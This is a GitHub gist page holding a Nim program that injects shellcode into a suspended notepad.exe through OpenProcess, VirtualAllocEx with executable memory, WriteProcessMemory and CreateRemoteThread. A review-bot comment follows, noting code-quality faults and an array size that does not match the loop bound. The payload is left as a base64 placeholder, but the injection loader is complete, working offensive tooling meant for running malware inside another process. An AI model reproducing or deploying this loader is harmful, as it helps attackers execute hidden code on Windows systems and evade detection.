Created
September 30, 2021 15:07
mttaggart created this gist
Sep 30, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,74 @@ # With special thanks to byt3bl33d3r for Offensive Nim! import winim/lean import osproc import base64 import sequtils import strutils proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void = let tProcess = startProcess("notepad.exe") tProcess.suspend() # That's handy! defer: tProcess.close() echo "[*] Target Process: ", tProcess.processID let pHandle = OpenProcess( PROCESS_ALL_ACCESS, false, cast[DWORD](tProcess.processID) ) defer: CloseHandle(pHandle) echo "[*] pHandle: ", pHandle let rPtr = VirtualAllocEx( pHandle, NULL, cast[SIZE_T](shellcode.len), MEM_COMMIT, PAGE_EXECUTE_READ_WRITE ) var bytesWritten: SIZE_T let wSuccess = WriteProcessMemory( pHandle, rPtr, unsafeAddr shellcode, cast[SIZE_T](shellcode.len), addr bytesWritten ) echo "[*] WriteProcessMemory: ", bool(wSuccess) echo " \\-- bytes written: ", bytesWritten echo "" let tHandle = CreateRemoteThread( pHandle, NULL, 0, cast[LPTHREAD_START_ROUTINE](rPtr), NULL, 0, NULL ) defer: CloseHandle(tHandle) echo "[*] tHandle: ", tHandle echo "[+] Injected" echo "[*] Running in x64 process" var sc = "Base64 Encoded string of comma-separated bytes goes here" var sc_seq = base64.decode(sc).split(",") .map(proc (h: string): string = strip(h)) .map(parseHexInt) var shellcode: array[200626, byte] for s in 0..200261: shellcode[s] = byte sc_seq[s] # This is essentially the equivalent of 'if __name__ == '__main__' in python when isMainModule: injectCreateRemoteThread(shellcode)
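Review bot: The `when isMainModule:` guard at the end gates only the `injectCreateRemoteThread(shellcode)` call, while the `base64.decode`, the `.map(parseHexInt)` parse, the `shellcode` array fill loop and the `echo "[*] Running in x64 process"` line all sit at module level and execute on import, so the comment comparing it to Python's `if __name__ == '__main__'` overstates what is actually guarded. Moving that setup under the same `when isMainModule:` block, or into a proc that the guarded call invokes, would make the comment accurate and keep importing the module side-effect free. Separately, the fill loop bound `for s in 0..200261` does not agree with the declared `array[200626, byte]`, and `sc_seq[s]` raises `IndexDefect` whenever the decoded list is shorter than the loop bound, so the two sizes should be derived from one value (`sc_seq.len`) rather than two hand-typed literals. The whole file, including the proc, lies inside this single hunk; the rendering has collapsed it onto one line, so exact line placement should be confirmed against the raw file.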